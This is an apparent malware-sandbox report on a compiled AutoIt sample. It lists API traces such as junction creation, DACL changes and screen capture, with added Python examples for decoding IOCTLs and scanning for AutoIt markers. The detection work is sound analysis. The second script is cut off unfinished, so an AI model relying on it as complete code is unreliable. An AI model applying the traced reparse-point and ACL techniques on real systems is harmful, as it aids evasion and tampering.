                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                            • String ID: 0$tooltips_class32
                                            • API String ID: 1297703922-3619404913
                                            • Opcode ID: d036878c5016878142ec525233eaadfe910023af38d734f7f7c73d1159084221
                                            • Instruction ID: e3d341373904766c24c3132b161c1afb76797aefcb488afe20d604863b15c89b
                                            • Opcode Fuzzy Hash: d036878c5016878142ec525233eaadfe910023af38d734f7f7c73d1159084221
                                            • Instruction Fuzzy Hash: 84718B71144305AFDB24CF28CC49FA67BE5EF88304F08452EF985A72A2D771E946DB92
                                            APIs
                                            • CharUpperBuffW.USER32(?,?), ref: 00E946AB
                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00E946F6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: BuffCharMessageSendUpper
                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                            • API String ID: 3974292440-4258414348
                                            • Opcode ID: 452378c97ac835035acdb9d4025a9433a83af1d18d1b0c4148acf3b9063edef4
                                            • Instruction ID: b365608b98e3afb15a7724da84df604bc25951c3bb07ee4f5a9aac3d0209b914
                                            • Opcode Fuzzy Hash: 452378c97ac835035acdb9d4025a9433a83af1d18d1b0c4148acf3b9063edef4
                                            • Instruction Fuzzy Hash: 32912BB46043059BCB14EF10C461AAAB7E5AF89354F04646DF8967B3A3DB31ED4ACB81
                                            APIs
                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00E9BB6E
                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00E99431), ref: 00E9BBCA
                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E9BC03
                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00E9BC46
                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00E9BC7D
                                            • FreeLibrary.KERNEL32(?), ref: 00E9BC89
                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00E9BC99
                                            • DestroyIcon.USER32(?,?,?,?,?,00E99431), ref: 00E9BCA8
                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00E9BCC5
                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00E9BCD1
                                              • Part of subcall function 00E3313D: __wcsicmp_l.LIBCMT ref: 00E331C6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                            • String ID: .dll$.exe$.icl
                                            • API String ID: 1212759294-1154884017
                                            • Opcode ID: 6365b2dbb2140d53171af110e8bdec134255144c30d57bf38c7598c3c8e52695
                                            • Instruction ID: ebcf892a6eb9232e96c6ff08162c06d2054cb11512e8de62114fdc099bc7a1f4
                                            • Opcode Fuzzy Hash: 6365b2dbb2140d53171af110e8bdec134255144c30d57bf38c7598c3c8e52695
                                            • Instruction Fuzzy Hash: 6561EF71600218BEEF14DF65DD86FBEBBA8EB08710F10521AF915F61C1DB70A994CBA0
                                            APIs
                                            • LoadStringW.USER32(00000066,?,00000FFF,00E9FB78), ref: 00E7A0FC
                                              • Part of subcall function 00E17F41: _memmove.LIBCMT ref: 00E17F82
                                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 00E7A11E
                                            • __swprintf.LIBCMT ref: 00E7A177
                                            • __swprintf.LIBCMT ref: 00E7A190
                                            • _wprintf.LIBCMT ref: 00E7A246
                                            • _wprintf.LIBCMT ref: 00E7A264
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%
                                            • API String ID: 311963372-1048875529
                                            • Opcode ID: bc4fdb0ef18548caa577bbfc4c7db9f1fdb7fcee71a739cb7cb39b2f3f6897d6
                                            • Instruction ID: e4596618c62403ba404c1ea28c47d4b4ca86717d4e373c90aaa962566df74e9f
                                            • Opcode Fuzzy Hash: bc4fdb0ef18548caa577bbfc4c7db9f1fdb7fcee71a739cb7cb39b2f3f6897d6
                                            • Instruction Fuzzy Hash: F5518172900209BBCF15EBE0DD46EEEB7B9AF08700F145165F515720A2EB316F99CB61
                                            APIs
                                              • Part of subcall function 00E19997: __itow.LIBCMT ref: 00E199C2
                                              • Part of subcall function 00E19997: __swprintf.LIBCMT ref: 00E19A0C
                                            • CharLowerBuffW.USER32(?,?), ref: 00E7A636
                                            • GetDriveTypeW.KERNEL32 ref: 00E7A683
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E7A6CB
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E7A702
                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E7A730
                                              • Part of subcall function 00E17D2C: _memmove.LIBCMT ref: 00E17D66
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                            • API String ID: 2698844021-4113822522
                                            • Opcode ID: 8ac85bad44836cf636bd1f8aea6edda81819e3a2de0b40382f9930fe81323944
                                            • Instruction ID: 52fec8996b7809bffcfa9edf5b858be5136ae2d6cbf69589dc32fa032106d1d7
                                            • Opcode Fuzzy Hash: 8ac85bad44836cf636bd1f8aea6edda81819e3a2de0b40382f9930fe81323944
                                            • Instruction Fuzzy Hash: 6B514F711043049FC704EF10C9919AEB7F5FF88718F08A96DF89A67251DB31AE4ACB52
                                            APIs
                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E7A47A
                                            • __swprintf.LIBCMT ref: 00E7A49C
                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E7A4D9
                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E7A4FE
                                            • _memset.LIBCMT ref: 00E7A51D
                                            • _wcsncpy.LIBCMT ref: 00E7A559
                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E7A58E
                                            • CloseHandle.KERNEL32(00000000), ref: 00E7A599
                                            • RemoveDirectoryW.KERNEL32(?), ref: 00E7A5A2
                                            • CloseHandle.KERNEL32(00000000), ref: 00E7A5AC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                            • String ID: :$\$\??\%s
                                            • API String ID: 2733774712-3457252023
                                            • Opcode ID: 810cd9db12a5daef28795df69b571b1dcd5385eabaf085dd3eaf45a03edbd906
                                            • Instruction ID: 8925acb67a615b5507c29752037c069bf1fd8d02af150a2b7362599fb1d4ed39
                                            • Opcode Fuzzy Hash: 810cd9db12a5daef28795df69b571b1dcd5385eabaf085dd3eaf45a03edbd906
                                            • Instruction Fuzzy Hash: C831B0B2500209ABDB21DFA1DC49FEF37BCEF88705F1451B6FA08E2160E77096448B25
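The entry above records the standard Win32 sequence for turning a freshly created directory into a junction (NTFS mount point): CreateDirectoryW, then CreateFileW on that directory with GENERIC_WRITE (40000000), OPEN_EXISTING (00000003) and FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT (02200000), then DeviceIoControl with control code 000900A4, which decodes to FSCTL_SET_REPARSE_POINT, using the "\??\%s" NT-path string as the link target, followed by CloseHandle and RemoveDirectoryW. The Python script below is an added example and is not part of the Joe Sandbox report or of the analysed sample: it decodes CTL_CODE values and CreateFileW arguments from trace lines written in the report's "Api.MODULE(args), ref: addr" format and flags the open-for-reparse-then-set-reparse-point pattern. The constants are copied from the Windows SDK headers; the lookup tables deliberately cover only a handful of codes, and the embedded trace is the ten calls listed in the entry above.

```python
import re

# Constants copied from the Windows SDK (winioctl.h, winnt.h, fileapi.h).
# Only a handful of codes are tabulated; anything else is reported numerically.
DEVICE_TYPES = {0x7: "FILE_DEVICE_DISK", 0x9: "FILE_DEVICE_FILE_SYSTEM",
                0x12: "FILE_DEVICE_NETWORK", 0x2D: "FILE_DEVICE_MASS_STORAGE"}
METHODS = ("METHOD_BUFFERED", "METHOD_IN_DIRECT", "METHOD_OUT_DIRECT", "METHOD_NEITHER")
ACCESS = ("FILE_ANY_ACCESS", "FILE_READ_ACCESS", "FILE_WRITE_ACCESS",
          "FILE_READ_ACCESS|FILE_WRITE_ACCESS")
KNOWN_FUNCTIONS = {(0x9, 41): "FSCTL_SET_REPARSE_POINT",      # 0x000900A4
                   (0x9, 42): "FSCTL_GET_REPARSE_POINT",      # 0x000900A8
                   (0x9, 43): "FSCTL_DELETE_REPARSE_POINT"}   # 0x000900AC
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
              0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
              0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}

# The ten calls of the report entry above, copied verbatim (bullets dropped).
TRACE = [
    "GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E7A47A",
    "__swprintf.LIBCMT ref: 00E7A49C",
    "CreateDirectoryW.KERNEL32(?,00000000), ref: 00E7A4D9",
    "CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E7A4FE",
    "_memset.LIBCMT ref: 00E7A51D",
    "_wcsncpy.LIBCMT ref: 00E7A559",
    "DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E7A58E",
    "CloseHandle.KERNEL32(00000000), ref: 00E7A599",
    "RemoveDirectoryW.KERNEL32(?), ref: 00E7A5A2",
    "CloseHandle.KERNEL32(00000000), ref: 00E7A5AC",
]

# 'Api.MODULE(arg,...), ref: ADDR' or, for argument-less entries, 'Api.MODULE ref: ADDR'
CALL_RE = re.compile(r"(\w+)\.(\w+)(?:\((.*)\))?,? ref: ([0-9A-F]+)")


def decode_ioctl(code):
    """Split a CTL_CODE value into device type, function, method and access."""
    device, access = (code >> 16) & 0xFFFF, (code >> 14) & 0x3
    function, method = (code >> 2) & 0xFFF, code & 0x3
    return {"device": DEVICE_TYPES.get(device, hex(device)), "function": function,
            "name": KNOWN_FUNCTIONS.get((device, function), "unknown"),
            "method": METHODS[method], "access": ACCESS[access]}


def decode_createfile(access, disposition, flags):
    """Name the GENERIC_* bits, the creation disposition and the FILE_FLAG_* bits."""
    return {"access": [n for bit, n in GENERIC_ACCESS.items() if access & bit],
            "disposition": DISPOSITION.get(disposition, hex(disposition)),
            "flags": [n for bit, n in FILE_FLAGS.items() if flags & bit]}


def _arg(text):
    """'?' (unresolved by the sandbox) -> None, hex literal -> int, else the raw string."""
    text = text.strip()
    if text == "?":
        return None
    try:
        return int(text, 16)
    except ValueError:
        return text            # e.g. a window class name such as tooltips_class32


def parse_call(line):
    """Parse one trace line from the report; returns None for non-call lines."""
    m = CALL_RE.search(line)
    if not m:
        return None
    args = [_arg(a) for a in (m.group(3) or "").split(",") if a.strip()]
    return {"api": m.group(1), "module": m.group(2), "args": args, "ref": m.group(4)}


def find_reparse_point_sequence(lines):
    """Return (ref, fsctl) for each FSCTL_SET_REPARSE_POINT issued after a
    CreateFileW that opened its target with FILE_FLAG_OPEN_REPARSE_POINT: the
    Win32 recipe for creating a junction / mount point on an existing directory."""
    findings, opened_for_reparse = [], False
    for line in lines:
        call = parse_call(line)
        if call is None:
            continue
        if call["api"] == "CreateFileW" and len(call["args"]) >= 6:
            access, disp, flags = call["args"][1], call["args"][4], call["args"][5]
            if None not in (access, disp, flags):
                opened_for_reparse = ("FILE_FLAG_OPEN_REPARSE_POINT"
                                      in decode_createfile(access, disp, flags)["flags"])
        elif call["api"] == "DeviceIoControl" and len(call["args"]) >= 2:
            code = call["args"][1]
            if isinstance(code, int):
                ioctl = decode_ioctl(code)
                if opened_for_reparse and ioctl["name"] == "FSCTL_SET_REPARSE_POINT":
                    findings.append((call["ref"], ioctl["name"]))
    return findings


if __name__ == "__main__":
    print(decode_ioctl(0x000900A4))
    print(decode_createfile(0x40000000, 3, 0x02200000))
    print(find_reparse_point_sequence(TRACE))
```

The pairing matters more than either call alone: FSCTL_SET_REPARSE_POINT on a handle that was not opened with FILE_FLAG_OPEN_REPARSE_POINT fails, and a CreateFileW with that flag is routine in backup and shell code, so the detector only reports the two together and in order. The same CTL_CODE decoder applies to any other DeviceIoControl code in a trace; extend KNOWN_FUNCTIONS as needed.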
                                            APIs
                                              • Part of subcall function 00E12612: GetWindowLongW.USER32(?,000000EB), ref: 00E12623
                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E9C4EC
                                            • GetFocus.USER32 ref: 00E9C4FC
                                            • GetDlgCtrlID.USER32(00000000), ref: 00E9C507
                                            • _memset.LIBCMT ref: 00E9C632
                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E9C65D
                                            • GetMenuItemCount.USER32(?), ref: 00E9C67D
                                            • GetMenuItemID.USER32(?,00000000), ref: 00E9C690
                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E9C6C4
                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E9C70C
                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E9C744
                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00E9C779
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                            • String ID: 0
                                            • API String ID: 1296962147-4108050209
                                            • Opcode ID: 185c93613fac43089ccae8963bfc3a781e4400f0358422e3a18d5436828dc45a
                                            • Instruction ID: 42d4d485539976030eac85258b19c1d337ae20e678add6b5708a3a43899d74ce
                                            • Opcode Fuzzy Hash: 185c93613fac43089ccae8963bfc3a781e4400f0358422e3a18d5436828dc45a
                                            • Instruction Fuzzy Hash: 72818270108301AFDB10EF25D984AABBBE4FB88718F20592EF995A7291D770D945CF92
                                            APIs
                                              • Part of subcall function 00E6874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E68766
                                              • Part of subcall function 00E6874A: GetLastError.KERNEL32(?,00E6822A,?,?,?), ref: 00E68770
                                              • Part of subcall function 00E6874A: GetProcessHeap.KERNEL32(00000008,?,?,00E6822A,?,?,?), ref: 00E6877F
                                              • Part of subcall function 00E6874A: HeapAlloc.KERNEL32(00000000,?,00E6822A,?,?,?), ref: 00E68786
                                              • Part of subcall function 00E6874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E6879D
                                              • Part of subcall function 00E687E7: GetProcessHeap.KERNEL32(00000008,00E68240,00000000,00000000,?,00E68240,?), ref: 00E687F3
                                              • Part of subcall function 00E687E7: HeapAlloc.KERNEL32(00000000,?,00E68240,?), ref: 00E687FA
                                              • Part of subcall function 00E687E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E68240,?), ref: 00E6880B
                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E68458
                                            • _memset.LIBCMT ref: 00E6846D
                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E6848C
                                            • GetLengthSid.ADVAPI32(?), ref: 00E6849D
                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00E684DA
                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E684F6
                                            • GetLengthSid.ADVAPI32(?), ref: 00E68513
                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E68522
                                            • HeapAlloc.KERNEL32(00000000), ref: 00E68529
                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E6854A
                                            • CopySid.ADVAPI32(00000000), ref: 00E68551
                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E68582
                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E685A8
                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E685BC
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                             • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                             • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                            • String ID:
                                            • API String ID: 3996160137-0
                                            • Opcode ID: 8a93477c07455e5d2f4d8386c49cfbb5a3f34f39e5258f5822000e943ab55181
                                            • Instruction ID: b034e71bd899c8924ffb3e402b314cd9b624af299344a0b57481acd1177b81fc
                                            • Opcode Fuzzy Hash: 8a93477c07455e5d2f4d8386c49cfbb5a3f34f39e5258f5822000e943ab55181
                                            • Instruction Fuzzy Hash: 3A615971940209AFDF00DFA1ED45AAEBBB9FF04344F14822AE815F6291DB319A14CF60
                                            APIs
                                            • GetDC.USER32(00000000), ref: 00E876A2
                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E876AE
                                            • CreateCompatibleDC.GDI32(?), ref: 00E876BA
                                            • SelectObject.GDI32(00000000,?), ref: 00E876C7
                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E8771B
                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E87757
                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E8777B
                                            • SelectObject.GDI32(00000006,?), ref: 00E87783
                                            • DeleteObject.GDI32(?), ref: 00E8778C
                                            • DeleteDC.GDI32(00000006), ref: 00E87793
                                            • ReleaseDC.USER32(00000000,?), ref: 00E8779E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                            • String ID: (
                                            • API String ID: 2598888154-3887548279
                                            • Opcode ID: 83cbbd1b427135ef692a47febbc83e88106b759feed41af55fd3a1f3e59f97c7
                                            • Instruction ID: b947b96d516830f2ef7b7e1cacd623493fc0e3e84d225f157542c6a92fc86bd1
                                            • Opcode Fuzzy Hash: 83cbbd1b427135ef692a47febbc83e88106b759feed41af55fd3a1f3e59f97c7
                                            • Instruction Fuzzy Hash: 57514C75904209EFCB15DFA9CC85EAEBBB9EF48710F14842EF989E7211D731A844CB50
                                            APIs
                                              • Part of subcall function 00E30B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E16C6C,?,00008000), ref: 00E30BB7
                                              • Part of subcall function 00E148AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E148A1,?,?,00E137C0,?), ref: 00E148CE
                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E16D0D
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00E16E5A
                                              • Part of subcall function 00E159CD: _wcscpy.LIBCMT ref: 00E15A05
                                              • Part of subcall function 00E3387D: _iswctype.LIBCMT ref: 00E33885
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000004.00000002.1302128850.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
                                            • Associated: 00000004.00000002.1302112395.0000000000E10000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000E9F000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302185303.0000000000EC5000.00000002.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302231734.0000000000ECF000.00000004.00000001.01000000.00000004.sdmp
                                            • Associated: 00000004.00000002.1302247961.0000000000ED8000.00000002.00000001.01000000.00000004.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_4_2_e10000_TOgpmvvWoj.jbxd
                                            Similarity
                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                            • API String ID: 537147316-1018226102
                                            • Opcode ID: 4cfe12452407e30650b830b088ef8e85a6a56f999cbf2e6f1b2178d07d991bf4
                                            • Instruction ID: 5268bc75a65b056228714b8127d30b10cb08c9cca531f60348eea7153ab37404
                                            • Opcode Fuzzy Hash: 4cfe12452407e30650b830b088ef8e85a6a56f999cbf2e6f1b2178d07d991bf4
                                            • Instruction Fuzzy Hash: 0D027D711083419FC724EF24D881AAFBBE5BF98354F14691DF4DAA72A1DB30D989CB42
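                                            The strings in this block ("AU3!", "EA06", ">>>AUTOIT SCRIPT<<<", "#include depth exceeded", "Bad directive syntax error") are the AutoIt interpreter's script-loader messages, which is why the report labels the sample a compiled AutoIt script. In the interpreter "AU3!" and "EA06" sit apart as separate constants, so a hit on those strings alone only proves the runtime is present; the embedded compiled script is recognised by a contiguous header. The check below is an added example for this page, not Joe Sandbox or AutoIt code. The 16-byte signature that precedes "AU3!EA06" is taken from the AutoIt file format as documented by script-extraction tools and is an assumption of the example, not something this report shows; the sample buffer in the usage is constructed.

```python
"""Search a file for the markers a compiled AutoIt binary carries.
Added example for this page; not Joe Sandbox or AutoIt code."""
import sys
from typing import Dict, List

# Strings this report lists for the interpreter's script loader.
SCRIPT_MARKER = b">>>AUTOIT SCRIPT<<<"
AU3_TAG = b"AU3!EA06"
# Assumption (taken from AutoIt script-extraction tooling, not from this
# report): an embedded compiled script begins with this 16-byte signature,
# immediately followed by AU3_TAG.
AU3_SIGNATURE = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")

MARKERS = {
    "compiled_script_header": AU3_SIGNATURE + AU3_TAG,
    "au3_tag": AU3_TAG,
    "script_marker": SCRIPT_MARKER,
}


def find_markers(data: bytes) -> Dict[str, List[int]]:
    """Return every offset at which each marker occurs in data."""
    hits: Dict[str, List[int]] = {}
    for name, pattern in MARKERS.items():
        offsets: List[int] = []
        start = 0
        while (pos := data.find(pattern, start)) != -1:
            offsets.append(pos)
            start = pos + 1
        hits[name] = offsets
    return hits


def classify(data: bytes) -> str:
    """Distinguish a binary that only carries the interpreter's loader strings
    from one that actually embeds a compiled script header."""
    hits = find_markers(data)
    if hits["compiled_script_header"]:
        return "compiled-autoit-script"
    if hits["au3_tag"] or hits["script_marker"]:
        return "autoit-loader-strings-only"
    return "no-autoit-markers"


if __name__ == "__main__":
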